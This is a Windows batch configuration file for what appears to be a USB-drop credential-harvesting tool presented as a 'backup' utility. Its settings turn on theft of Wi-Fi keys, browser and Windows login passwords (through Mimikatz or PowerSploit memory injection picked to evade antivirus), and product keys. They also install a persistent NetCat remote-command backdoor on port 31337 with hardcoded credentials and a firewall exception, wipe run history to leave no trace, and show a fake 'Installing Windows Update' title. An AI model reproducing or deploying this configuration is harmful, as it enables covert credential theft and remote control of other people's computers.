REM When "DT_DEBUGGING" is set to TRUE, echo will be set to "ON" and the script will pause when execution is complete.
set DT_DEBUGGING=FALSE
REM When the variable "DT_CON_VERIFY_WRITTEN_FILES" is set to TRUE, cmd verifys that files are written to the disk correctly.
set DT_CON_VERIFY_WRITTEN_FILES=TRUE
REM "CON_PROGRAM_ARCHIVE_PASSWORD" is the default password for encrypted archives.
set CON_PROGRAM_ARCHIVE_PASSWORD=KHJoiy7IkignnmbmnIY986RtJSBIijIUHnjghfHccDtuj
REM "CON_DT_BKD" is the directory where backups are stored.
set CON_DT_BKD=%VAR_DT_CWD%\Backups
REM "CON_DT_BKD_MAIN" is the directory where backups for the specific PC are stored.
set CON_DT_BKD_MAIN=%CON_DT_BKD%\%COMPUTERNAME%
REM "CON_DT_RES_DIRECTORY_ROOT" is the directory where the external programs are located.
set CON_DT_RES_DIRECTORY_ROOT=%VAR_DT_CWD%\Res
REM When "CON_DT_LOG" is set to TRUE, this program saves a log of its execution to the configured file.
set CON_DT_LOG=TRUE
REM "CON_DT_LOGFILE" is the setting for where logs are saved as.
set CON_DT_LOGFILE=%VAR_DT_CWD%\BackupLog.txt
REM When "CON_DT_CHECK_RES" is set to TRUE, the program executes the process of checking that the external programs integrity are correct and that they haven't been tampered with.
set CON_DT_CHECK_RES=FALSE
REM When "CON_DT_SOUNDPLAY_0" is set to true, the program will execute the configured sound file after the execution of everything else has completed. A total of 4 sounds can be configured.
set CON_DT_SOUNDPLAY_0=TRUE
set CON_DT_SOUNDWAVFILE_0=%CON_DT_RES_DIRECTORY_ROOT%\Sounds\0\sound.wav
set CON_DT_SOUNDVBSFILE_0=%CON_DT_RES_DIRECTORY_ROOT%\Sounds\0\sound.vbs
set CON_DT_SOUNDPLAY_1=FALSE
set CON_DT_SOUNDWAVFILE_1=%CON_DT_RES_DIRECTORY_ROOT%\Sounds\1\sound.wav
set CON_DT_SOUNDVBSFILE_1=%CON_DT_RES_DIRECTORY_ROOT%\Sounds\1\sound.vbs
set CON_DT_SOUNDPLAY_2=FALSE
set CON_DT_SOUNDWAVFILE_2=%CON_DT_RES_DIRECTORY_ROOT%\Sounds\2\sound.wav
set CON_DT_SOUNDVBSFILE_2=%CON_DT_RES_DIRECTORY_ROOT%\Sounds\2\sound.vbs
set CON_DT_SOUNDPLAY_3=FALSE
set CON_DT_SOUNDWAVFILE_3=%CON_DT_RES_DIRECTORY_ROOT%\Sounds\3\sound.wav
set CON_DT_SOUNDVBSFILE_3=%CON_DT_RES_DIRECTORY_ROOT%\Res\Sounds\3\sound.vbs
set CON_DT_SOUNDPLAY_4=FALSE
set CON_DT_SOUNDWAVFILE_4=%CON_DT_RES_DIRECTORY_ROOT%\Sounds\4\sound.wav
set CON_DT_SOUNDVBSFILE_4=%CON_DT_RES_DIRECTORY_ROOT%\Sounds\4\sound.vbs
REM "CON_DT_AFTER_EXECUTION_COMMAND" declares what the program should do when everything has executed. The triggers for this variable are:
REM 0 - Do nothing
REM 1 - Lock workstation/system. The equivalent of pressing Win+L.
REM 2 - Power off the workstation/system.
REM 3 - Reboot workstation/system.
set CON_DT_AFTER_EXECUTION_COMMAND=0
REM The other variables below are self explanatory. Just read them yourself.
set CON_DT_BACKUP_WIFI_KEYS=TRUE
set CON_DT_BACKUP_WIFI_KEYS_PATH=%CON_DT_BKD_MAIN%\WiFi
set CON_DT_BACKUP_SAVED_PASSWORDS=TRUE
set CON_DT_BACKUP_SAVED_PASSWORDS_PATH=%CON_DT_BKD_MAIN%\Saved_Passwords
set CON_DT_BACKUP_SAVED_PASSWORDS_FILE=Browser_Passwords.txt
set CON_DT_BACKUP_WINDOWS_LOGIN_PASSWORDS=TRUE
set CON_DT_BACKUP_WINDOWS_LOGIN_PASSWORDS_PATH=%CON_DT_BKD_MAIN%\WinPass
set CON_DT_BACKUP_WINDOWS_LOGIN_PASSWORDS_FILE=Windows_Passwords.txt
set CON_DT_BACKUP_WINDOWS_LOGIN_PASSWORDS_FILE_DMP=Windows_Passwords.dmp
REM "CON_DT_BACKUP_WINDOWS_LOGIN_PASSWORDS_METHOD" declares how the program should backup Windows logon passwords. The triggers for this variable are:
REM 0 - Use procdump (Typically slow, but AV safe).
REM 1 - Use Mimikatz (Faster, but not AV safe and doesn't support Windows 8.1).
REM 2 - Use both procdump and Mimikatz.
REM 3 - Use PowerSploit Mimikatz RAM injection (Slow and requires a internet connection, but avoids AV).
set CON_DT_BACKUP_WINDOWS_LOGIN_PASSWORDS_METHOD=3
set CON_DT_BACKUP_PRODUCT_KEYS=TRUE
set CON_DT_BACKUP_PRODUCT_KEYS_PATH=%CON_DT_BKD_MAIN%\ProdKeys
set CON_DT_BACKUP_PRODUCT_KEYS_FILE=Product_Keys.txt
set CON_DT_BACKUP_PRODUCT_KEYS_WITH_PRODUKEY=FALSE
set CON_DT_BACKUP_PRODUCT_KEYS_WITH_PRODUKEY_PATH=%CON_DT_BKD_MAIN%\ProdKeys
set CON_DT_BACKUP_PRODUCT_KEYS_WITH_PRODUKEY_FILE=Produkey_Keys.txt
set CON_DT_BACKUP_DIRECTORY_LISTINGS=TRUE
set CON_DT_BACKUP_DIRECTORY_LISTINGS_PATH=%CON_DT_BKD_MAIN%\DirListings
set CON_DT_BACKUP_DIRECTORY_LISTINGS_FILE=Directory_Listings.txt
set CON_DT_BACKUP_VARIABLE_LISTINGS=TRUE
set CON_DT_BACKUP_VARIABLE_LISTINGS_PATH=%CON_DT_BKD_MAIN%\VarListings
set CON_DT_BACKUP_VARIABLE_LISTINGS_FILE=Variable_Listings.txt
set CON_DT_LIST_WORKGROUPS_AND_DOMAINS=TRUE
set CON_DT_LIST_WORKGROUPS_AND_DOMAINS_PATH=%CON_DT_BKD_MAIN%\Other
set CON_DT_LIST_WORKGROUPS_AND_DOMAINS_FILE=Domains.N.Workgroups.txt
set CON_DT_MESSAGE_SHOW_AFTER_EXECUTION=FALSE
set CON_DT_MESSAGE_SHOW_AFTER_EXECUTION_MESSAGE=Execution complete!
set CON_DT_MESSAGE_SHOW_AFTER_EXECUTION_TITLE=Title!
set CON_DT_CHANGE_ADMIN_PASSWORD=FALSE
set CON_DT_CHANGE_ADMIN_PASSWORD_TO=Hak5_Admin_Password
set CON_DT_API_DIRECTORY=%CON_DT_RES_DIRECTORY_ROOT%\API
set CON_DT_INIT_USE_SCRIPTS=TRUE
set CON_DT_INIT_SCRIPTS_DIRECTORY=%VAR_DT_CWD%\Init
REM The variable "CON_DT_CLEANUP_SCRIPT" defines what files should be deleted when the program has executed.
set CON_DT_CLEANUP_SCRIPT=del /f "%VAR_DT_CWD%\invis.vbs" ^& del /f "%TEMP%\DS.bat" ^& del /f "%VAR_DT_CWD%\elevate.vbs"
REM When the variable "CON_DT_ERASE_RUN_HISTORY" is set to TRUE, the program clears the Windows run-history so there is no trace of this program ever being ran.
set CON_DT_ERASE_RUN_HISTORY=TRUE
REM When the variable "CON_DT_NETCAT_USE" is set to TRUE, NetCat gets installed into the "%SystemRoot%\nc" directory, then NetCat runs silently upon to boot of Windows. With NetCat running, you are able to execute commands from a remote computer. The default username for NCAT is: Lavanoid, and the default password is: LavanoidVolcanic.
set CON_DT_NETCAT_USE=TRUE
REM The variable "CON_DT_NETCAT_SERVICE_PROGRAM" defines what program is installed as a service.
set CON_DT_NETCAT_SERVICE_PROGRAM=Netcat_Script.bat
REM The variable "CON_DT_NETCAT_NCAT_EXECUTABLE" defines what and where the NetCat executable is.
set CON_DT_NETCAT_NCAT_EXECUTABLE=ncat.exe
REM The variable "CON_DT_NETCAT_LISTEN_PORT" defines what port NetCat should listen on.
set CON_DT_NETCAT_LISTEN_PORT=31337
REM The variable "CON_DT_NETCAT_FIREWALL_ENTRY_INSTALL" determines if a firewall entry for NetCat should be installed.
set CON_DT_NETCAT_FIREWALL_ENTRY_INSTALL=TRUE
REM The two variables below determine the names of the firewall entries.
set CON_DT_NETCAT_FIREWALL_ENTRY_INSTALL_NAME=NCAT
set CON_DT_NETCAT_FIREWALL_ENTRY_INSTALL_PORT_TCP_NAME=NCATTCP
REM The variable "CON_DT_NETCAT_LISTEN_PROGRAM" determines what program should be executed by NetCat when a client connects.
set CON_DT_NETCAT_LISTEN_PROGRAM=Terminal.bat
REM The variable "CON_DT_NETCAT_LISTEN_PROGRAM_UPDATE" determines if the program should update the Terminal.bat and Netcat_Script.bat for NetCat.
set CON_DT_NETCAT_LISTEN_PROGRAM_UPDATE=TRUE
REM The variable "CON_DT_NETCAT_COPY_TO_PATH" defines where NetCat should be installed.
set CON_DT_NETCAT_COPY_TO_PATH=%SystemRoot%\nc
REM The variable "CON_WINDOW_TITLE" defines the program title.
set CON_WINDOW_TITLE=Installing Windows Update...
REM The variable "CON_WINDOW_CLI" defines the default layout of the program window.
set CON_WINDOW_CLI=COLOR F0 ^& @echo %CON_WINDOW_TITLE%
REM When the variable "CON_DT_UNMOUNT_USB_STORAGE" is set to TRUE, the script unmounts the storage device that it is located on.
set CON_DT_UNMOUNT_USB_STORAGE=FALSE